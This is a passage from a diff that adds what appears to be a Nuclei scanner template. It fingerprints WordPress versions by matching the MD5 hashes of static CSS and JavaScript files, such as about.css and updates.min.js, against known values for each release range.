md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"8b9f36f8ca91dda15909c08299ddf4ad\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c748456e1cf97f3303ee25c838b1ad76\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/list-tables.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"42d17149c8bfdd7bebab0f53091a540a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"beb6bf82e0790eac731ed2c9cf74bc3f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3ff2a3c0951e5984e1679e368706ec80\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4b8d9513e1dda944e989056488048494\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"0a4fd78915295ce70bda1d402bfa1243\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"e5a6313e0366749912b54fc9e6040369\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b34413b3174ac624919ce065ebb29aba\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"d3d28113c92faef3c774e0d3344e6753\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + 
dsl: + - "(\"bc8de1e3aa737d9a6450fa52af53fca9\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"90f30b6794fb69ec0541ee4c0b489642\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"de506d4d874f0c934c2fd497284f1cf3\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6e5a8f97fb61749f4ce2774ce9882d9f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4306f07d19cb972ef5b21f7f7df2a700\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e72f0c18a1ac5753fca51e7ffa4c6840\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"d037c13f12f0d6e2bb80796aa1fa7100\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"df2291c2b2d7db61ec1759a80639ae6a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"41bf5f054e0769ac8c19771c9e7898b9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e185971aba90c98bede11c149165d1bd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"bfc791004a369b00c17bac0f2422949b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/list-tables-rtl.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"746b23cd955a0b7107f57b83bb42eaa8\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"cbed75a1b6445166304c7f98e244451a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e7ab062a42f5d7660c2e05a20cdb1e79\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f3db51aaac5931d61f45b7d025018ddd\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"fa889ee210eab899c77c4fb798382a7f\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"8450e3801667a4d5f4d5119cf76d23ac\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a44b142006df40f488aec4ea1357883c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"611bc9de9e6a21a2a5e212e3662c310b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - 
"(\"26f22d6631f339ad47196082f40de0d2\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3b84dce5fe42bd82dcbdd360524e6885\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"aa514770cd537ac1dab53b85ad96b929\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8ba73ea9935bbe0062f747e1d084f542\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"05619b1a7fa0923fdc99f081dabccc25\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b74cc4eea587399f54605be6c761a682\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"1aa559e1f4775e857e0758979b9bb728\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"84dec80acc4755197100bfa80edf7d19\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"961ad7e71c705c7e758797f35d64035e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c603d3442c8daa8e824854b5d7150866\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"17daddb65adfa5ef0434db0162b86dd7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/core-data.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"c3d32f5dd4f33a89882a4f3cbafc940f\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"0ba8486f9af269c4f15ccb446fa2e5cf\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"d9d282309deba0fae8e0d9e1390bb2a0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cb85cf4b9ae2a6381b1a86fa89fb00aa\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"72ce8e024f83842696876fbe0b892c73\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a4b350169e5e63499026406ea5028a6f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"a00f664edef495e33670bc0524284989\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0f271130cb6a7aba0a543efb33674d96\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"586fc92c2f1f003c7bed0ffa8ffd2296\" == 
md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"010335a7eb409f2d9aa88519224931aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/core-data.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ced082774acad429d083a6950f6628c8\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"d97824b5d4dd4da084ce9d60d6d2d24c\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"73143e8195b1151c70875f1f7717e778\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8bb6dfc7a694dc50d11d0fcf7ab7dd82\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4e11a15c78ad0a4058eaf79431984730\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"9ad4ec366f1ecfdc2ee3246da8aeba12\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"b800c3b5370efc6207abaf2a7609edab\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4a8ed0892820752f3167351b83bf97e4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f37c57b5e57c30a4fc7eb773f538a180\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"262ccfe129b4b19a5cae7bd108548486\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"46df98dc062cb7b94aaf2fb4e4281446\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"56617c86221439d8d23e5a718e0254ad\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"54a9556e4830fb69925ad216617c5aad\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3d25a492a20498e5cc6079bb415229cb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e0a7cc4c8737ceb854977049f33c3a38\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"46947f78f46f99af4bac89dd1da70cd1\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"28198d097d66e3ae2e4c629582b509c4\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - 
"(\"7bd14c8e33f234537fcd94d597d10899\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e99936017ea5a1097387e30fb101f217\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ad946b505a2b3daee06388e607b9501\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/style.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"96e3e6b2948530ce7f016ab0400006a1\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"cd3dee513ca0233a0239f64fc6188638\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"59d50c0db9d21f6a092e347714520c01\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3c01e1e5243ac56a810d123f6f54bdbd\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d4f6f63315fabfe67ee51657f5dad012\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f8b85f00c1b9dfc396d3d88b3e82e2d1\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"3db1581f4f550fbefb2e1463af099255\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"7e0f44886262bba35795227fa8509b2f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0d82bfbebd5c1a7daca9d8838d8f42e6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6f7537b8f5767cc8f7549c8029d8b79c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/about.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3e86ee80c4757521083fddf65019f0f8\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"c32129f38a610afeb5dab84cc2b42e4c\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"205cf588eb9148f70d7ba3a7632fed00\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f09335d5dd7bac3dfe1b465dedc21884\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"3ffba678fe0d4d1c646548bfa0852e0e\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"361b64acafceb9cf7c9ce468ad4e8bbe\" == md5(body))" + - 
type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"718d7d80feb983bda20b662544bff255\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cebf5e333fceaf3a09ac21206d9e4456\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"fa5010338412db572184b952c5f4ca1d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"88642f61e57afda1fe4d990b74ace699\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"bbf6106da26fcee52129ee9fc94c1274\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"83bf1c455339d52f73f9f0f4dfe5ead6\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"9c19373b31c25620aaae73ff3a6c3cd3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6844aa5a41dc592f8d440ef94866a07d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1416017950ab1d21dc3e62b4bbf8b74a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/about.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d4838a0cc22480b2f6c1bbdadacdc3ef\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"058a5c94a16613204b8b983be03b16c6\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"78b67f44579068eb8a32c2d710a197e9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"95db5eece947287d156afe6ec7ca8403\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a81a4579a2bf58c42998289ea1ca04d2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"d3b700086ab8f218fd0986abe9c37601\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f0c69f88bca95e586cd57cf7b50d56ce\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b9fb9fd3206264ae2dfc758320e4fe2a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"2de0fcd4fae637c2aca9a0d6bab89ae5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"08b2f42d94424e7286e13f07c84e2613\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - 
"(\"871ed49ec868803d4bbda74cd056b5f2\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"bb9b6fbc1d72522b2a28a7eaeb188cbd\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"229b8ef25f99dcdb2a3bb54aa98e05f0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e926309fb95633d36c56f6d493ce1c71\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"77b749a7fbd4dbaa77847c5a31e53b81\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"932eae208509eff74628c9823eb6c857\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"d218cc5bad00dc5fbd1dbb700b9a633a\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"2ad7e2a527f4964d216eaa65bc74b9bc\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"081c37be6a3ade3eb41c567f545c838a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"56562a00c8ad3a0e0b7cc6fce51400bd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8c86fe6f4995c72b426099da6bb00a94\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/about-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"2df8ff7a7b394e41cba1f30b711f4597\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"9f68812437e18cc5b27b48ade01e6319\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"114df4c9f91f08b37ac227c43c9461ec\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"945adb0a070994b88b38a1435ba156b2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7eb9a84f6a5e8f9856fabe6f60ae26d0\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"070bb778119c82963673e25e8d87a22a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a2812f9bae76c25229981a60a3452159\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e24b2585db1193b02e488fadf94556f6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1dedd8baf6ded0cffcd68486568f48d3\" == 
md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"efa868c38c56b4f20e24e42434fd75c9\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"9ee8a4c60f28860ca3880eb08420da35\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"c260aca44db825b1a9c18c25e01a1994\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"44136116a8d6a562e4e24c2e92a5497e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d8170174c63a02f4cee1ac1555f4c714\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6e5d25bcbd4b0bc5d7985726a5c75b25\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a8b86325839973057132c58b9b3e92aa\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"0e042d73816458bd697aad16c3949840\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"941d939b4fed92d736eca75101dfb0fd\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"ab6d1b6da897ad2f5c2d6efc5930195d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b4f2ce7a2583ca3be4510f6aea884f7a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"597c5b2c2a12373f069e3bfcc1234f70\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/about-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"8d05415e4e89324ef4e55877369ff484\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"cad438384d68d17329fc137dc4e70f6f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e49b0b679670933616a105c5e36c0996\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6133222a9a4e020cc470597e2b03ade0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"f20c6e14d6405a90139741f3408d131c\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"1e470d76d5b4e0602dcc8816b300d7da\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"ad2c3b52306afa838247a29f5dc8abaf\" == md5(body))" + - type: dsl + name: 5.1 - 
5.1.8 + dsl: + - "(\"2c9b9d16ab26ca648a797cc6d1bc083b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"30e7181b360d0371a72c736456ed9814\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"aa3864d2140200bd86c347b31d2c7208\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"5f0344be8172538fc040a5fb2b616704\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"54cef500a837d369390eaa0ce40a0c06\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"956415400ece9efeed1a49ac08c5428c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6b60539b5b42f59ebbccefc9d007a5ba\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b7dd42474bcd55ed030b52a40c8d62b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-grid.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"9cc1fed809dadd16be78544cb911c7d6\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"76fe68861654653491ec8a68ceb2da4c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8d6c6a7438e56ab59fddb7575b40c4e4\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.19 + dsl: + - "(\"d01d7c54b7f1e87d1b3c9e7d9cd8589c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"4cbc52e0ac47f37a70c89fc46eb69d4b\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"8a6c5d01c0ae57b622ce0a20b6de3285\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"9a70c60a2cf8bdf9508df9bb94706065\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"6fcfc76c8ca516b3b7e2e8f72e7ad2ca\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"d863d1e6f0e999c2080b1190d31cdccc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"1fa1bd41398fffc5e65332ee0fcb4ede\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"1af7b5cd2620f279bc60b87c301079ba\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - 
"(\"7a93323ee3739e031e68fec070ab6d38\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"c8896b1283866646f21915c987e39997\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"f7c7b421dade9edb8932bd04ca50233a\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"40b80909b8b10d707d83e349bbf05cef\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"beec5f6a592c05e40a2b7e8e1b906cd8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"33ce0803e0c8d668b8574f99c21502d6\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"a03ff7aeb919c4c1af45fa1ac85a8e5c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d7de3a2d8fec560b403476fd9ed70a78\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-grid.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d06c587bf1819bb955e35d6254f384f1\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"846bbf2e3acc156ce4d6deb772c703b3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"7311485f4f9ecc49ce92bc6cc1c1d678\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.19 + dsl: + - "(\"1e05c8c75113e18fb3626f7ddbe07cbd\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"3c666ce2209e20ef9e7e5c8417b59fc8\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"eb246badf364507c2f0edb0f8e38c77c\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"8d2e9573969040d7c24f7d46776962c5\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"5754139e4118cbaccd60669624da3065\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"b04ed37dbd60bc3663ada890d5af18e6\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"e9d2357fad91f0fa0122b21653d2b283\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"bc5625b3c5dec3a72a57e8456c548904\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - 
"(\"88f319fffd52138a412d301fcd33f88a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"b3bf3298bc66384705d5c9c1de18a24d\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"4c9e03f3ca3f12ac8c820bca5bc48b5f\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"feea7fbaa550658bf561a0720dd98c2e\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"05d645908e3212ce5103239db436e6f9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9f624a3f0011d006198f92000404dc39\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"cad76757937f5deef6ddac30e8389329\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e913c5b0e38f50d575b2d0d2240bcaba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/updates.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a20c8b8bcd86b05c5484f17b550d85a2\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"d52fdbc0a62e4bfb9cfc1c5f033c520f\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.4 + dsl: + - "(\"3e99508d7b8c46362f99dccd1dcf963c\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"c0f5ff6dd746ec2a6581fefcb2463381\" == md5(body))" + - type: dsl + name: 4.6.6 - 4.6.20 + dsl: + - "(\"cdd533d7f74e3776eed9975f9150d7ec\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.5 + dsl: + - "(\"c28e11e820bc3df934161e2b8bd534d9\" == md5(body))" + - type: dsl + name: 4.5.9 - 4.5.23 + dsl: + - "(\"35d80bf44fd2d582486dec7a23cc1880\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.8 + dsl: + - "(\"c3d379d0566156a7f2d52399b8be6282\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.9 + dsl: + - "(\"a3f43c9368858c75107e22ee643c8b9d\" == md5(body))" + - type: dsl + name: 4.4.10 - 4.4.24 + dsl: + - "(\"9f3baab230c3592d5074946bca14a80c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.10 + dsl: + - "(\"c4da9a77a79000d837de42c577373124\" == md5(body))" + - type: dsl + name: 4.3.11 - 4.3.25 + dsl: + - 
"(\"0898f3c6521e958ea67134f70905f6a0\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.14 + dsl: + - "(\"e98e960b62fed4e4cdd241594d805477\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"0f5a5b69ce6a28ec4efcaf68a55c21d5\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.2.29 + dsl: + - "(\"36e86bacd40a8bd856812b595564e319\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"00dc5cbe3151f0ade362e16ac8b15b9f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a06f2c9b655df3b573f28ecfc6c1441b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"abf0583845e397a181226d79a8dea21a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"3691081f395094238d54950f43053808\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"c109de1687cdbc96ee5b65fd32b10e7e\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"2d5652fcb04e5210b9bb86317b023902\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"45787a6ec1fdba7ec87920cb488113ce\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"d06dee6d89b3ca8dafa4beae31e81d8b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"113fa25e9ece18de5da152a58de9648a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c4cbfd6b4e85c8dcff629fa3e9dbac05\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"1544137e147d6405e1d28293fcdf3ef5\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"3f2145bf3b2568ca5fef63c7159c7aa1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"045625e028cca15d1e0d5c62355f4f44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/updates.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0614cc34cb47d44f572435394169ccee\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"16789704a2a7b8a4c3c15bc8ddf57aaa\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.4 + dsl: + - 
